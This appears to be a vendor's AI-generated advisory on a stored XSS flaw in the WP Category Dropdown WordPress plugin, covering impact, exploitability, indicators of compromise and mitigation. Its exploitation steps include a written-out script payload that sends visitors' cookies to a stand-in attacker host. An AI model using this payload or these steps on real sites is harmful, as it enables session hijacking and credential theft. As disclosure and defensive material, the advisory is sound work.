CVE-2025-58239
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-58239 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Category Dropdown WordPress plugin by Chandrika Sista. It affects all versions up to and including 1.9, with no official patch available at the time of disclosure. The vulnerability was published on September 22, 2025, and carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An authenticated attacker with at least Contributor-level privileges can inject malicious scripts into the plugin's input fields, which are then persistently stored and rendered in the browser of any user who visits the affected page. Exploitation requires low attack complexity over a network vector, but does require user interaction (a victim visiting the page containing the injected payload) (Patchstack, Red Hat CVE).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which execute in the browsers of visiting users. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious content to site visitors. The scope is changed, meaning the impact extends beyond the vulnerable component to affect other users' browser sessions (Patchstack).

Exploitability

No evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.033%, indicating a low probability of exploitation in the near term. No exploit kits or threat actor attribution have been identified, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack classifies this as low priority, noting it is unlikely to be exploited despite the class of vulnerability being used in mass-exploit campaigns targeting WordPress plugins (Patchstack, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the WP Category Dropdown plugin version 1.9 or earlier, using tools like WPScan or manual inspection of plugin directories.
  2. Obtain Contributor access: Register or compromise an account with at least Contributor-level privileges on the target WordPress site.
  3. Inject malicious payload: Navigate to the plugin's input field (e.g., a post or widget configuration area managed by WP Category Dropdown) and insert a stored XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Save the payload: Submit or save the content so the malicious script is persisted in the WordPress database.
  5. Trigger execution: Wait for a privileged user (e.g., administrator) or site visitor to load the page containing the injected payload, causing the script to execute in their browser and potentially stealing session cookies or performing actions on their behalf (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin-related admin endpoints (e.g., wp-admin/admin-post.php or wp-admin/post.php) from low-privileged accounts containing script tags or encoded JavaScript payloads.
  • Database: Unexpected <script> tags or JavaScript URIs stored in WordPress database tables (e.g., wp_posts, wp_options, or plugin-specific tables) associated with WP Category Dropdown entries.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after loading pages containing WP Category Dropdown output, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for stored XSS, but review plugin configuration files for unauthorized modifications.

Mitigation and workarounds

As of the disclosure date (September 22, 2025), no official patch is available for the WP Category Dropdown plugin. Site administrators should consider deactivating and removing the plugin until a patched version is released. As a compensating control, restrict Contributor-level user registrations and review existing Contributor accounts for trustworthiness. Web application firewalls (WAFs) with XSS filtering rules can help mitigate exploitation risk in the interim (Patchstack).

Community reactions

Patchstack, which discovered and reported the vulnerability (credited to researcher 'zaim', reported August 1, 2025), classifies it as low priority with no impactful threat at this time. No significant vendor statements, notable researcher commentary, or broader media coverage have been identified beyond the initial Patchstack disclosure (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-16974MEDIUM6.4
  • kirki
NoYesAug 11, 2026
CVE-2026-14549NONEN/A
  • lingotek-translation
NoNoAug 11, 2026
CVE-2026-14548NONEN/A
  • lingotek-translation
NoNoAug 11, 2026
CVE-2026-19089NONEN/A
  • product-input-fields-for-woocommerce
NoYesAug 10, 2026
CVE-2026-19077NONEN/A
  • copy-delete-posts
NoYesAug 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management